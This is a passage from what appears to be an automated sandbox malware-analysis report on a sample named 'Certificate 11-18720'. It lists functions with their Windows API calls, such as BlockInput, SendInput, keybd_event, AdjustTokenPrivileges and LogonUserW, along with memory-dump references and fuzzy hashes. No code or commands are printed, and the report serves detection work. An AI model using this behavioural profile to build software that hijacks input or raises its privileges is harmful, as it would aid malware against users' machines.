                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 3228d9be9731184ef2e744a373e47472a28f23e5504ddd1926578e43bacdb14d
                                                                                    • Instruction ID: 9f2d46dc1ebdb2c55b6c5c98ce68f1ecd9a77a3dc4b6f85b51bcd456da2126e8
                                                                                    • Opcode Fuzzy Hash: 3228d9be9731184ef2e744a373e47472a28f23e5504ddd1926578e43bacdb14d
                                                                                    • Instruction Fuzzy Hash: DD1180726106019FD714EF28D849A2EB7EAFF95324F00891EF9A9D7391DB30AD018B85
                                                                                    Function 0060CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0061BE6A,?,?,00000000,?), ref: 0060CEA7
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0061BE6A,?,?,00000000,?), ref: 0060CEB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: a28690a3fadd507e2129ec96f382e806134e66b489b090516c70f7e54dbaac22
                                                                                    • Instruction ID: 54654df5e70b320789620af199872a026e5e3bfc99051a7522b96179cfb9249b
                                                                                    • Opcode Fuzzy Hash: a28690a3fadd507e2129ec96f382e806134e66b489b090516c70f7e54dbaac22
                                                                                    • Instruction Fuzzy Hash: 7FF08235500329BBDB10AFA4DC49FEB7B6EBF49361F004165F919D6191D6709A40CBA0
                                                                                    Function 0060411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00604153
                                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00604166
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InputSendkeybd_event
                                                                                    • String ID:
                                                                                    • API String ID: 3536248340-0
                                                                                    • Opcode ID: e6cc760687e793644283394cb2ea5600ce19bbdcddd4e4ab9edea54187159669
                                                                                    • Instruction ID: 6a7ac54a8d8760ce3c1637f4b6cedda46cc33e48822708fd55e74bc0846cb5f0
                                                                                    • Opcode Fuzzy Hash: e6cc760687e793644283394cb2ea5600ce19bbdcddd4e4ab9edea54187159669
                                                                                    • Instruction Fuzzy Hash: 5BF0677490424DAFDB098FA0C805BBE7BB1EF00305F00804AF966A6292DB798612DFA0
                                                                                    Function 005FAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005FACC0), ref: 005FAB99
                                                                                    • CloseHandle.KERNEL32(?,?,005FACC0), ref: 005FABAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: 354105d386247429bd02c6fb5e348d7ec4de24ea1ce46a9de08d3f1bb55378e2
                                                                                    • Instruction ID: 45f7dd7fe83e691855416635d605c5eacd6a6858acc596ddc7e426b64fdd0e2e
                                                                                    • Opcode Fuzzy Hash: 354105d386247429bd02c6fb5e348d7ec4de24ea1ce46a9de08d3f1bb55378e2
                                                                                    • Instruction Fuzzy Hash: 22E0E675000511AFE7362F54FC09D777BEAFF45320710842AF95A81574D7626C90DB50
                                                                                    Function 005E81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,005E6DB3,-0000031A,?,?,00000001), ref: 005E81B1
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005E81BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 23e41638f107b245f877255fc2fb2813ada144569f851e5eab3d794f529cbc04
                                                                                    • Instruction ID: b111e54ac04e15019aa7f6dae0a56154b191079ee4c928b3a976ad37840669d4
                                                                                    • Opcode Fuzzy Hash: 23e41638f107b245f877255fc2fb2813ada144569f851e5eab3d794f529cbc04
                                                                                    • Instruction Fuzzy Hash: 6CB09235544608FBDB022FA1EC09B587FAAEB0BA52F009010F60D840618B7254108AA2
                                                                                    Function 005ED1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 91615eed616f7e8d7d5c6912771070537c6e8ae8c5da7710dd8dc958c3d736c7
                                                                                    • Instruction ID: 9dee2a68befa3b58bfe06b48ed6bc26a1051703d465135643e16e2fab3a044e0
                                                                                    • Opcode Fuzzy Hash: 91615eed616f7e8d7d5c6912771070537c6e8ae8c5da7710dd8dc958c3d736c7
                                                                                    • Instruction Fuzzy Hash: 04325621D28F424DD7279635CC32335AA99BFB73C5F15E737E81AB59A6EB28C4834110
                                                                                    Function 005C96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 674341424-0
                                                                                    • Opcode ID: 47e6571deb7dfcb88d2662118cce97d37446947661c9c708fbcb7bf30bf7471a
                                                                                    • Instruction ID: fb817f2a28a8a42d1bb4c25878bfca13d97775ade17bca6dd5b0c65738b66781
                                                                                    • Opcode Fuzzy Hash: 47e6571deb7dfcb88d2662118cce97d37446947661c9c708fbcb7bf30bf7471a
                                                                                    • Instruction Fuzzy Hash: EB2288715083029FD724DF58C899FABBBE5BF84314F10491EF89A9B291DB71E944CB82
                                                                                    Function 005F038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ad7c4fd85d1da8cfff098dc6bfe5a809efbd7e5f5e3133a4b8a61bb52394aa4
                                                                                    • Instruction ID: 1efb44c7ffe9731ea511cf4497dce3f429b6bbcba40e35929c3af6e7740c3776
                                                                                    • Opcode Fuzzy Hash: 7ad7c4fd85d1da8cfff098dc6bfe5a809efbd7e5f5e3133a4b8a61bb52394aa4
                                                                                    • Instruction Fuzzy Hash: C7B1E120D2AF414DD72396398835336BA5D6FBB2D6F91E71BFC1774D62EB2181834180
                                                                                    Function 0060B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 0060B6DF
                                                                                      • Part of subcall function 005E344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0060BDC3,00000000,?,?,?,?,0060BF70,00000000,?), ref: 005E3453
                                                                                      • Part of subcall function 005E344A: __aulldiv.LIBCMT ref: 005E3473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    • Opcode ID: 963848d9821aace3a968ec350863b68409110f3df8dc569303ba5dc617bf60e6
                                                                                    • Instruction ID: 2137da27a7831df7a1a28dc44880d8703b3e8b393ae653505322afd4cdaed291
                                                                                    • Opcode Fuzzy Hash: 963848d9821aace3a968ec350863b68409110f3df8dc569303ba5dc617bf60e6
                                                                                    • Instruction Fuzzy Hash: 6E21AF72634610CBC729CF28C881A96B7E2EB95710B249E6DE0E5CB2C0CB74BA05CB54
                                                                                    Function 00616AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 00616ACA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    • Opcode ID: f18270675c53f03069fa07b628b20a47453db24e7f90e1fbecdec0ce43ebed48
                                                                                    • Instruction ID: 1713ec4ae3da88098bf30e80a1805ddf09fb3b2f78fff742bdc1314c34f42752
                                                                                    • Opcode Fuzzy Hash: f18270675c53f03069fa07b628b20a47453db24e7f90e1fbecdec0ce43ebed48
                                                                                    • Instruction Fuzzy Hash: 63E0123A2102056FC700EB99D804E96BBEDAFB4751F058426F946D7351DAB0E8448BA0
                                                                                    Function 006074E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0060750A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: c5396aa11609d40cb5d6af809521a1cf16223aad45ef2ff7864b88212f1260b1
                                                                                    • Instruction ID: abeacd8e0b2ded24b5a31c04911641ff11ff045267134fd5ba9c2707ed0d419d
                                                                                    • Opcode Fuzzy Hash: c5396aa11609d40cb5d6af809521a1cf16223aad45ef2ff7864b88212f1260b1
                                                                                    • Instruction Fuzzy Hash: 45D092A4AEC60979ED2E07249C1FFF71A4BF301785FD45589B603D92C0ACE47D02A075
                                                                                    Function 005FB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,005FAD3E), ref: 005FB124
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LogonUser
                                                                                    • String ID:
                                                                                    • API String ID: 1244722697-0
                                                                                    • Opcode ID: 3406605f138ddbea47361e2e29eb1e785f2eb744772830a018ff4529f4202e57
                                                                                    • Instruction ID: 9125815ee8b37dfcb18fccefaca9f86acee8414aa5942f0a0af1c4bbbda21940
                                                                                    • Opcode Fuzzy Hash: 3406605f138ddbea47361e2e29eb1e785f2eb744772830a018ff4529f4202e57
                                                                                    • Instruction Fuzzy Hash: 97D05E321A460EAEDF024FA4DC02EAE3F6AEB04B00F409110FA11C60A0C671D531AB50
                                                                                    Function 0063B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameUser
                                                                                    • String ID:
                                                                                    • API String ID: 2645101109-0
                                                                                    • Opcode ID: 475546c903205109b65a8e5eeef2f7b6340ab3e313bb5f70460ae4593c730706
                                                                                    • Instruction ID: 65723fc2169e1437ec9d4b65ce21ef99dd2ba76eaae2808d2ae2be9f79c67b59
                                                                                    • Opcode Fuzzy Hash: 475546c903205109b65a8e5eeef2f7b6340ab3e313bb5f70460ae4593c730706
                                                                                    • Instruction Fuzzy Hash: 05C04CB1800109DFC751CFC0C9449EEB7BDAB04705F1050919145F2110D7749B469B72
                                                                                    Function 005E8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 005E818F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: bb78f29ed5618039d1457f89af333f862150743b6be504b972a079276de578ce
                                                                                    • Instruction ID: 4c8a3fbeb35db0dd0c2139fe33928663fbd509e1d990934c63f762eb42224927
                                                                                    • Opcode Fuzzy Hash: bb78f29ed5618039d1457f89af333f862150743b6be504b972a079276de578ce
                                                                                    • Instruction Fuzzy Hash: 14A0223000020CFBCF022F82FC088883FAEFB032A0B000020F80C80030CB33A8208AE2
                                                                                    Function 005CE3B0 Relevance: .5, Instructions: 540COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d140065c63d0567cd2418855e77f0c5d9cdd055fac49a22a0c128f9e336a5c3
                                                                                    • Instruction ID: d0c3561d747a8b6d08b08d0723649672e6603e3a323f9b0399839663cdc2cde0
                                                                                    • Opcode Fuzzy Hash: 2d140065c63d0567cd2418855e77f0c5d9cdd055fac49a22a0c128f9e336a5c3
                                                                                    • Instruction Fuzzy Hash: E0229CB09002168FDB24DF98D486FAEBBB1FF58304F14856EE9469B351E335AD81CB91
                                                                                    Function 005C93F0 Relevance: .5, Instructions: 531COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c49c2e06e20a0ff70fac07a23412aa4283580cd9a27df2845a35acfbaca618ff
                                                                                    • Instruction ID: 71673d1113b9644449b3dccbcb53ca2d314f1c941db65791d5ee1adef6629cef
                                                                                    • Opcode Fuzzy Hash: c49c2e06e20a0ff70fac07a23412aa4283580cd9a27df2845a35acfbaca618ff
                                                                                    • Instruction Fuzzy Hash: 58128E70A0060ADFDF14DFA5D999AEEBBF6FF88300F104569E406E7290EB35A951CB50
                                                                                    Function 005CAF50 Relevance: .5, Instructions: 514COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3728558374-0
                                                                                    • Opcode ID: 2f186fe3bae36f8888686579f83de2d2be33af14b2ebd62df4b75638e32db886
                                                                                    • Instruction ID: 958fbb60ad9104f43b4bb6c63e953d57598c7dcaeda3087abb48ce5fed6d163c
                                                                                    • Opcode Fuzzy Hash: 2f186fe3bae36f8888686579f83de2d2be33af14b2ebd62df4b75638e32db886
                                                                                    • Instruction Fuzzy Hash: 2202B370A00106DFDF14DF68D996AAEBBB5FF84300F14846AE806EB355EB31DA51CB91
                                                                                    Function 005E02A4 Relevance: .3, Instructions: 345COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
